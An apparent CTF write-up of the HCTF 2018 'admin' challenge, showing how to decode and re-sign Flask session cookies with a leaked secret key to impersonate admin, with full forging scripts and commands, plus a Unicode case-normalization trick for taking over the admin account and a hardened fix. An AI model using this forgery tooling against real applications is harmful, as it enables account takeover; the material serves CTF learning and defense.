Flask session forgery: HCTF admin
2022-07-07 13:48:00 【A traveler】
Knowledge point:
Flask's session is stored on the client side, inside a cookie, and Flask only signs the data. A signature prevents tampering; it does not prevent reading. Flask applies no encryption, so the entire session content can be read on the client without the key. (Server-side sessions, kept in a database or in files on the server, do exist, but they are an extension rather than the default.)
For challenges where only admin can read the flag, we can forge the session to impersonate admin, provided we can get hold of the application's secret key.
The steps are as follows:
A forgery script is required. Download address: https://github.com/noraj/flask-session-cookie-manager
1. First get the website's session value: press F12 and take it from the cookie, then decode the session (it is not encrypted, so no key is needed for this step). There are plenty of decoding scripts online; the one I use is:
#!/usr/bin/env python3
# Decode a Flask session cookie without knowing the secret key.
# The cookie is "payload.timestamp.signature"; only the payload is needed to
# read it, because Flask signs the session but does not encrypt it.
import sys
import zlib
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)        # strip the signature
    payload, timestamp = payload.rsplit(b'.', 1)  # strip the timestamp
    decompress = False
    if payload.startswith(b'.'):                  # leading '.' = zlib-compressed
        payload = payload[1:]
        decompress = True
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception') from e
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload') from e
    # TaggedJSONSerializer restores Flask's tagged types (bytes, tuples, ...)
    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))
This script can sit next to the forgery script (flask_session_cookie_manager3.py) downloaded from https://github.com/noraj/flask-session-cookie-manager, which handles both decoding and encoding, and both are used from the command line.
Usage: python session_decrypt.py <session value>
For example:
>python session_decrypt.py eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.XyZ3Vw.OcD3-l1yOcq8vlg8g4Ww3FxrhVs
Result (the decoded payload of that cookie):
{'username': b'guest'}
2. Forge the decoded session. Forging requires the secret key, so we must first find the application's key (typically in config.py or in the source the challenge leaks). Usually the target is admin, so just change the username to admin.
Usage: flask_session_cookie_manager3.py does both encoding and decoding for Flask sessions; here we mainly use encode.
Command: python flask_session_cookie_manager3.py encode -s "<secret key>" -t "<decoded session, with the username changed>"
For example:
python flask_session_cookie_manager3.py encode -s "woshicaiji" -t "{'username': b'admin'}"
3. Put the forged session back into the cookie.
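The three steps above carried out in one script, as an added example that is not code from this post or from flask-session-cookie-manager. It reimplements Flask's default SecureCookieSessionInterface scheme (itsdangerous URLSafeTimedSerializer, salt cookie-session, HMAC key derivation, SHA-1 signature) so it runs without Flask installed; the sample cookie is the one from the post, and the key "woshicaiji" is taken from the post's encode example and is only assumed for the demo, not claimed to be the key that signed that sample cookie. Only the bytes and tuple tags of Flask's tagged JSON are handled, which is enough for the cookies shown here.

```python
#!/usr/bin/env python3
"""Decode, tamper with and re-sign a Flask client-side session cookie.
Added example, not code from the post or from flask-session-cookie-manager.
It reimplements Flask's default session signing (itsdangerous
URLSafeTimedSerializer, salt 'cookie-session', HMAC key derivation, SHA-1)
so that it runs without Flask installed."""
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"  # Flask's fixed salt for the session cookie


def b64d(s):
    """urlsafe base64 decode, restoring the '=' padding that Flask strips."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64e(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def _untag(obj):
    # Flask's TaggedJSONSerializer stores non-JSON types as one-key dicts:
    # {" b": "<base64>"} for bytes, {" t": [...]} for tuples.  Assumption:
    # those two tags are all that the cookies in this post need.
    if isinstance(obj, dict) and len(obj) == 1:
        key, val = next(iter(obj.items()))
        if key == " b":
            return base64.b64decode(val)
        if key == " t":
            return tuple(val)
    return obj


def _tag(obj):
    if isinstance(obj, bytes):
        return {" b": base64.b64encode(obj).decode("ascii")}
    if isinstance(obj, tuple):
        return {" t": [_tag(v) for v in obj]}
    if isinstance(obj, dict):
        return {k: _tag(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [_tag(v) for v in obj]
    return obj


def decode_session(cookie):
    """Read the payload.  No key is needed: the cookie is signed, not encrypted."""
    payload = cookie.rsplit(".", 2)[0]      # drop ".timestamp.signature"
    compressed = payload.startswith(".")    # leading '.' means zlib-compressed
    raw = b64d(payload[1:] if compressed else payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw, object_hook=_untag)


def _derive_key(secret_key):
    # itsdangerous 'hmac' key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def encode_session(data, secret_key, timestamp=None):
    """Serialize and sign as Flask does: payload.timestamp.signature."""
    raw = json.dumps(_tag(data), separators=(",", ":")).encode()
    packed = zlib.compress(raw)
    payload = "." + b64e(packed) if len(packed) < len(raw) - 1 else b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = f"{payload}.{ts_b64}"
    sig = hmac.new(_derive_key(secret_key), value.encode(), hashlib.sha1).digest()
    return f"{value}.{b64e(sig)}"


def verify_session(cookie, secret_key):
    """True iff the signature was made with secret_key (what the server checks)."""
    value, sig = cookie.rsplit(".", 1)
    expected = hmac.new(_derive_key(secret_key), value.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(b64e(expected), sig)


def forge_session(cookie, secret_key, **changes):
    """Decode a captured cookie, overwrite fields, re-sign with the leaked key."""
    data = decode_session(cookie)
    data.update(changes)
    return encode_session(data, secret_key)


if __name__ == "__main__":
    # Sample cookie from the post; the key is only assumed for this demo.
    captured = "eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.XyZ3Vw.OcD3-l1yOcq8vlg8g4Ww3FxrhVs"
    print(decode_session(captured))                 # {'username': b'guest'}
    forged = forge_session(captured, "woshicaiji", username=b"admin")
    print(forged, decode_session(forged), verify_session(forged, "woshicaiji"))
```

Two practical notes: the timestamp is part of the signed value and Flask rejects cookies older than PERMANENT_SESSION_LIFETIME (31 days by default), so forge with a fresh timestamp rather than reusing the captured one; and verify_session is the exact check the server performs, which is why a wrong guess at the key fails before the payload is ever trusted.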
Taking HCTF admin as an example:
First register an account with an arbitrary name and password. A hint can be found in the page source of the change-password page, and the useful source code is in that hint.
The source for this challenge has to be recovered from the hints given; refer to other write-ups for the exact process. In any case, once you have the download path, look at the routes first (although in this challenge they contain nothing special).
Reference: BUUCTF [HCTF 2018]admin 1 (wow Xiaohua's blog, CSDN)
1. Copy the session and decode it:
python session_decrypt.py .eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAgnACI7ieq-71NQjG8PwFEfNsnQ.YsLkGA.-IhgD3h5Rju-WwMa4YbLJO69j6I
Result:
{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': '123', 'user_id': '10'}
Change the name value 123 to admin, then forge.
The secret key is in config.py; here it is ckj123.
2. Forge directly:
python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': 'admin', 'user_id': '10'}"
Result:
.eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAtqWrTzCC67nqXn-DYAzPX_3EbhA.YsLnVA.f91nHdCGekSIwqWqz9T9cba5tkA
3. Paste the result into the session cookie and refresh; the flag is displayed.
Auditing the code of this challenge also reveals a second functional vulnerability:
Unicode deception
The strlower() function can be deceived. Reference:
HCTF admin: on Flask session forgery and Unicode deception (Z3eyOnd's blog, CSDN)
That is, look up a special Unicode code point such as ᴬ (U+1D2C, modifier letter capital A) for A. If we register ᴬdmin, the function turns ᴬ into A on that first pass, so the stored name is Admin and does not collide with admin; when we then change the password or log in again, the second pass turns A into a, the name becomes admin, and the goal is reached.
There is also a race condition; refer to the link above.
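The two-pass strlower() behaviour described above, modelled as an added example that is not the challenge's own code. The assumption is that the challenge's strlower() behaves like "lowercase, then NFKC compatibility normalization", which reproduces exactly the ᴬ to A to a sequence the post describes (lower() leaves U+1D2C untouched because it has no case mapping, and NFKC then folds it to a plain A). The toy account store and the attacker's flow are constructed for the demo; the hardened variant normalizes to a fixed point so that no later pass can change the stored name.

```python
"""Model of the strlower() Unicode trick from the post, plus a hardened version.
Added example, not the challenge's code.  Assumption: the challenge's strlower()
acts like 'lowercase, then NFKC', which gives the two-pass behaviour described."""
import unicodedata

ADMIN = "admin"


def strlower_vuln(name):
    # Pass 1 on 'ᴬdmin': lower() keeps U+1D2C (no case mapping), NFKC folds it
    # to 'A' -> 'Admin'.  Pass 2 on 'Admin': lower() -> 'admin'.
    return unicodedata.normalize("NFKC", name.lower())


def strlower_fixed(name):
    # Hardened: normalize then casefold until the value stops changing, so a
    # later pass over the stored name can never produce a different string.
    cur = name
    for _ in range(4):
        nxt = unicodedata.normalize("NFKC", cur).casefold()
        if nxt == cur:
            return cur
        cur = nxt
    raise ValueError("username does not reach a stable normalized form")


class Accounts:
    """Toy user table keyed by the normalized name (constructed for the demo)."""

    def __init__(self, strlower):
        self.strlower = strlower
        self.passwords = {ADMIN: "original-admin-pw"}

    def register(self, name, password):
        key = self.strlower(name)          # pass 1: becomes the stored key
        if key in self.passwords:
            raise ValueError("name taken")
        self.passwords[key] = password
        return key                         # the challenge puts this in session['name']

    def change_password(self, session_name, new_password):
        key = self.strlower(session_name)  # pass 2: normalizes the stored key again
        self.passwords[key] = new_password
        return key


def run_attack(strlower):
    """True if registering 'ᴬdmin' lets the attacker reset admin's password."""
    db = Accounts(strlower)
    try:
        session_name = db.register("\u1d2cdmin", "attacker-pw")   # stored as 'Admin'
        db.change_password(session_name, "pwned")                 # lands on 'admin'
    except ValueError:
        return False                       # hardened store refuses the collision
    return db.passwords[ADMIN] == "pwned"


if __name__ == "__main__":
    print(strlower_vuln("\u1d2cdmin"), strlower_vuln(strlower_vuln("\u1d2cdmin")))
    print("vulnerable:", run_attack(strlower_vuln), "fixed:", run_attack(strlower_fixed))
```

With the hardened function the registration itself is rejected, because ᴬdmin normalizes straight to admin, which is already taken; the same fixed-point rule should be applied on every path that touches a username (registration, login, password change) so that all of them agree on one canonical form.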